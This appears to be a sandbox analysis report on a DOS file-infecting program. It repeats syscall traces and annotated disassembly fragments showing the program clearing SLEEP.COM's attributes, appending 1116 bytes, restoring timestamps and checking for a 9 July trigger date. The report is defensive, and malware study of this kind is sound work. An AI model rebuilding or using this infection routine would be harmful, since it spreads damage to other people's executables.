0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8                              ; target not in this excerpt
; No visible trace row has PC 12b90, so the call site below was not observed running here.
0x12b89: mov ah, 0x1a                             ; INT 21h AH=1Ah: set disk transfer address (DTA)
0x12b8b: lea dx, word ptr [bp - 0x2c]             ; DX = address of the local buffer at bp - 0x2c
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e                             ; AH=4Eh: find first matching file
0x12b92: mov cx, 0x10                             ; attribute mask 0x10 = include directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]                 ; DX = 0x19f + word at [0x106]; presumably a load-offset fix-up, confirm
2018-12-25T12:30:47.443630748Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:47.447753319Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.035998192Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.039678569Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.043651783Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.044716603Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.056449191Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.068236158Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.07479825Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12c82 after INT 21h "Get time" (op 44 = AH 2Ch), which returns
; DH = seconds and DL = hundredths; the add on the row above folds them into one byte in DL.
; The excerpt stores that byte, sets the target's attributes to 0 and reopens it read/write.
; With the write, date/time and attribute rows that follow in the trace, this is the
; behavioural sequence to alert on: attribute change, reopen for write, writes to an executable.
0x12c84: je 0x12c7e                               ; sum was zero: back to 0x12c7e (not shown; presumably re-reads the clock)
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]                 ; si = 0x115 + word at [0x106]; presumably a load-offset fix-up, confirm
0x12c8d: mov byte ptr [si], dl                    ; store the clock-derived byte; its later use is not visible here
0x12c8f: mov ax, 0x4301                           ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx                               ; new attributes = 0 (read-only, hidden, system, archive all cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1                             ; DS:DX = path string at si + 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e                             ; AH=3Eh: close the handle in BX (BX is set before this excerpt)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02                           ; AX=3D02h: open, access mode 2 = read/write
0x12ca3: int 0x21                                 ; DX is not reloaded; relies on it still pointing at the same path
0x12ca5: jb 0x12c5e                               ; CF set = open failed -> 0x12c5e (not shown)
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax               ; save the new handle at ES:[path + 0x5d]
0x12cad: xchg ax, bx                              ; handle -> BX for the calls that follow
0x12cae: mov ah, 0x40                             ; AH=40h: write; the trace's next write row is at 0x12cb8
2018-12-25T12:30:49.077655931Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:49.094020324Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:49.09597229Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.10281285Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:49.10614364Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.108897067Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.111631787Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:49.114556483Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:49.123545534Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:49.124981889Z 62 PC: 12d05 | Close file
2018-12-25T12:30:49.133970521Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:49.144224216Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:49.147288337Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.154687163Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.161008386Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.163073672Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.175204528Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.176876807Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.183491751Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.19194297Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.194854342Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.197719642Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.209094066Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.21867803Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.220191808Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.228524346Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.238444166Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:49.241397699Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.248249455Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.255302035Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.257289475Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.267002791Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.268898267Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.280545858Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.287018773Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.289409062Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.291210069Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.29250809Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.298532213Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.299638326Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.304915605Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.315700074Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12b6a after INT 21h "Get date" (op 42 = AH 2Ah), which returns
; DH = month and DL = day, so the cmp on the row above tests DX == 0x0709, i.e. 9 July.
; The run-settings lines visible on this page all give 1 January 1980 and the trace goes on
; to 0x12d93/0x12d9a, which is consistent with the not-equal path; the code at 0x12d1c was
; not observed in these runs, so this trace says nothing about what the date branch does.
0x12b6e: je 0x12b73                               ; date matched -> trampoline at 0x12b73
0x12b70: jmp 0x12d88                              ; any other date: continue at 0x12d88 (not in this excerpt)
0x12b73: jmp 0x12d1c                              ; 9 July only: target not in this excerpt
; NOTE(review): 0x12b76-0x12b85 follows an unconditional jmp and was decoded by linear sweep.
; The first bytes are probably data and the listing looks one byte out of step: read from
; 0x12b7f, the same encodings give push bp / mov bp, sp / sub sp, 0x2c / push si, which
; matches the [bp - 0x2c] buffer used at 0x12b8b. Treat the next eight rows as unreliable.
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8                              ; target not in this excerpt
; No visible trace row has PC 12b90, so the call site below was not observed running here.
0x12b89: mov ah, 0x1a                             ; INT 21h AH=1Ah: set disk transfer address (DTA)
0x12b8b: lea dx, word ptr [bp - 0x2c]             ; DX = address of the local buffer at bp - 0x2c
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e                             ; AH=4Eh: find first matching file
0x12b92: mov cx, 0x10                             ; attribute mask 0x10 = include directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]                 ; DX = 0x19f + word at [0x106]; presumably a load-offset fix-up, confirm
2018-12-25T12:30:49.318006727Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:49.322177446Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.32546011Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.329451216Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.334255392Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.335826367Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.349091108Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.35762565Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.36530763Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12c82 after INT 21h "Get time" (op 44 = AH 2Ch), which returns
; DH = seconds and DL = hundredths; the add on the row above folds them into one byte in DL.
; The excerpt stores that byte, sets the target's attributes to 0 and reopens it read/write.
; With the write, date/time and attribute rows that follow in the trace, this is the
; behavioural sequence to alert on: attribute change, reopen for write, writes to an executable.
0x12c84: je 0x12c7e                               ; sum was zero: back to 0x12c7e (not shown; presumably re-reads the clock)
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]                 ; si = 0x115 + word at [0x106]; presumably a load-offset fix-up, confirm
0x12c8d: mov byte ptr [si], dl                    ; store the clock-derived byte; its later use is not visible here
0x12c8f: mov ax, 0x4301                           ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx                               ; new attributes = 0 (read-only, hidden, system, archive all cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1                             ; DS:DX = path string at si + 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e                             ; AH=3Eh: close the handle in BX (BX is set before this excerpt)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02                           ; AX=3D02h: open, access mode 2 = read/write
0x12ca3: int 0x21                                 ; DX is not reloaded; relies on it still pointing at the same path
0x12ca5: jb 0x12c5e                               ; CF set = open failed -> 0x12c5e (not shown)
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax               ; save the new handle at ES:[path + 0x5d]
0x12cad: xchg ax, bx                              ; handle -> BX for the calls that follow
0x12cae: mov ah, 0x40                             ; AH=40h: write; the trace's next write row is at 0x12cb8
2018-12-25T12:30:49.369093239Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:49.388064506Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:49.390170878Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.397970676Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:49.402114675Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.405612184Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.40892802Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:49.412552539Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:49.423206926Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:49.425028186Z 62 PC: 12d05 | Close file
2018-12-25T12:30:49.435374567Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:49.446799272Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:49.449984918Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.459048225Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.463552591Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.465301186Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.473927148Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.475837641Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.484168301Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.487238947Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.490317611Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.493918192Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.496437421Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.507760976Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.510137066Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.51919929Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.531677672Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:49.534953923Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.54265911Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.551097263Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.553491673Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.565347912Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.56849261Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.576153086Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.579397246Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.584832994Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.588394075Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.591102427Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.601850341Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.604320892Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.613063854Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.624485321Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12b6a after INT 21h "Get date" (op 42 = AH 2Ah), which returns
; DH = month and DL = day, so the cmp on the row above tests DX == 0x0709, i.e. 9 July.
; The run-settings lines visible on this page all give 1 January 1980 and the trace goes on
; to 0x12d93/0x12d9a, which is consistent with the not-equal path; the code at 0x12d1c was
; not observed in these runs, so this trace says nothing about what the date branch does.
0x12b6e: je 0x12b73                               ; date matched -> trampoline at 0x12b73
0x12b70: jmp 0x12d88                              ; any other date: continue at 0x12d88 (not in this excerpt)
0x12b73: jmp 0x12d1c                              ; 9 July only: target not in this excerpt
; NOTE(review): 0x12b76-0x12b85 follows an unconditional jmp and was decoded by linear sweep.
; The first bytes are probably data and the listing looks one byte out of step: read from
; 0x12b7f, the same encodings give push bp / mov bp, sp / sub sp, 0x2c / push si, which
; matches the [bp - 0x2c] buffer used at 0x12b8b. Treat the next eight rows as unreliable.
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8                              ; target not in this excerpt
; No visible trace row has PC 12b90, so the call site below was not observed running here.
0x12b89: mov ah, 0x1a                             ; INT 21h AH=1Ah: set disk transfer address (DTA)
0x12b8b: lea dx, word ptr [bp - 0x2c]             ; DX = address of the local buffer at bp - 0x2c
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e                             ; AH=4Eh: find first matching file
0x12b92: mov cx, 0x10                             ; attribute mask 0x10 = include directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]                 ; DX = 0x19f + word at [0x106]; presumably a load-offset fix-up, confirm
2018-12-25T12:30:49.628352936Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:49.63290405Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.534976913Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.538386345Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.543185522Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.544236369Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.550504915Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.557948654Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.564756537Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12c82 after INT 21h "Get time" (op 44 = AH 2Ch), which returns
; DH = seconds and DL = hundredths; the add on the row above folds them into one byte in DL.
; The excerpt stores that byte, sets the target's attributes to 0 and reopens it read/write.
; With the write, date/time and attribute rows that follow in the trace, this is the
; behavioural sequence to alert on: attribute change, reopen for write, writes to an executable.
0x12c84: je 0x12c7e                               ; sum was zero: back to 0x12c7e (not shown; presumably re-reads the clock)
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]                 ; si = 0x115 + word at [0x106]; presumably a load-offset fix-up, confirm
0x12c8d: mov byte ptr [si], dl                    ; store the clock-derived byte; its later use is not visible here
0x12c8f: mov ax, 0x4301                           ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx                               ; new attributes = 0 (read-only, hidden, system, archive all cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1                             ; DS:DX = path string at si + 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e                             ; AH=3Eh: close the handle in BX (BX is set before this excerpt)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02                           ; AX=3D02h: open, access mode 2 = read/write
0x12ca3: int 0x21                                 ; DX is not reloaded; relies on it still pointing at the same path
0x12ca5: jb 0x12c5e                               ; CF set = open failed -> 0x12c5e (not shown)
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax               ; save the new handle at ES:[path + 0x5d]
0x12cad: xchg ax, bx                              ; handle -> BX for the calls that follow
0x12cae: mov ah, 0x40                             ; AH=40h: write; the trace's next write row is at 0x12cb8
2018-12-25T12:30:49.567053139Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:49.587798924Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:49.590176665Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.597789509Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:49.605315811Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.608725957Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.612725887Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:49.614378006Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:49.622401194Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:49.624118917Z 62 PC: 12d05 | Close file
2018-12-25T12:30:49.632842005Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:49.644082488Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:49.64720855Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.656175437Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.664697951Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.667070395Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.678851829Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.681478819Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.688938592Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.691964543Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.695353637Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.698290926Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.700325847Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.71109785Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.712958978Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.722190352Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.734142767Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:49.737512272Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.7450553Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.75280408Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.755543261Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.766751946Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.769057206Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.777381211Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.781028181Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.783049181Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.787481874Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.789602655Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.799997058Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.802663983Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.811500373Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.822752708Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12b6a after INT 21h "Get date" (op 42 = AH 2Ah), which returns
; DH = month and DL = day, so the cmp on the row above tests DX == 0x0709, i.e. 9 July.
; The run-settings lines visible on this page all give 1 January 1980 and the trace goes on
; to 0x12d93/0x12d9a, which is consistent with the not-equal path; the code at 0x12d1c was
; not observed in these runs, so this trace says nothing about what the date branch does.
0x12b6e: je 0x12b73                               ; date matched -> trampoline at 0x12b73
0x12b70: jmp 0x12d88                              ; any other date: continue at 0x12d88 (not in this excerpt)
0x12b73: jmp 0x12d1c                              ; 9 July only: target not in this excerpt
; NOTE(review): 0x12b76-0x12b85 follows an unconditional jmp and was decoded by linear sweep.
; The first bytes are probably data and the listing looks one byte out of step: read from
; 0x12b7f, the same encodings give push bp / mov bp, sp / sub sp, 0x2c / push si, which
; matches the [bp - 0x2c] buffer used at 0x12b8b. Treat the next eight rows as unreliable.
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8                              ; target not in this excerpt
; No visible trace row has PC 12b90, so the call site below was not observed running here.
0x12b89: mov ah, 0x1a                             ; INT 21h AH=1Ah: set disk transfer address (DTA)
0x12b8b: lea dx, word ptr [bp - 0x2c]             ; DX = address of the local buffer at bp - 0x2c
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e                             ; AH=4Eh: find first matching file
0x12b92: mov cx, 0x10                             ; attribute mask 0x10 = include directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]                 ; DX = 0x19f + word at [0x106]; presumably a load-offset fix-up, confirm
2018-12-25T12:30:49.826540507Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:49.831880161Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.914948438Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.930696274Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.934773734Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.93582193Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.942766619Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.959022481Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.986225711Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12c82 after INT 21h "Get time" (op 44 = AH 2Ch), which returns
; DH = seconds and DL = hundredths; the add on the row above folds them into one byte in DL.
; The excerpt stores that byte, sets the target's attributes to 0 and reopens it read/write.
; With the write, date/time and attribute rows that follow in the trace, this is the
; behavioural sequence to alert on: attribute change, reopen for write, writes to an executable.
0x12c84: je 0x12c7e                               ; sum was zero: back to 0x12c7e (not shown; presumably re-reads the clock)
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]                 ; si = 0x115 + word at [0x106]; presumably a load-offset fix-up, confirm
0x12c8d: mov byte ptr [si], dl                    ; store the clock-derived byte; its later use is not visible here
0x12c8f: mov ax, 0x4301                           ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx                               ; new attributes = 0 (read-only, hidden, system, archive all cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1                             ; DS:DX = path string at si + 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e                             ; AH=3Eh: close the handle in BX (BX is set before this excerpt)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02                           ; AX=3D02h: open, access mode 2 = read/write
0x12ca3: int 0x21                                 ; DX is not reloaded; relies on it still pointing at the same path
0x12ca5: jb 0x12c5e                               ; CF set = open failed -> 0x12c5e (not shown)
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax               ; save the new handle at ES:[path + 0x5d]
0x12cad: xchg ax, bx                              ; handle -> BX for the calls that follow
0x12cae: mov ah, 0x40                             ; AH=40h: write; the trace's next write row is at 0x12cb8
2018-12-25T12:30:49.988597338Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:50.004370252Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:50.00645151Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:50.013360834Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:50.017029202Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:50.019927399Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:50.022806638Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:50.026001026Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:50.03551142Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:50.037291556Z 62 PC: 12d05 | Close file
2018-12-25T12:30:50.062267106Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:50.07215877Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:50.075089496Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:50.08288825Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:50.089598255Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:50.091997232Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:50.103573944Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:50.105575543Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:50.112313459Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:50.115589844Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:50.117499752Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:50.119319881Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:50.121005922Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:50.126736638Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:50.127826774Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:50.132958244Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:50.143678047Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:50.146582212Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:50.15410275Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:50.160984804Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:50.16340695Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:50.174541808Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:50.177245499Z 61 PC: 12ca5 | Open file (See above)
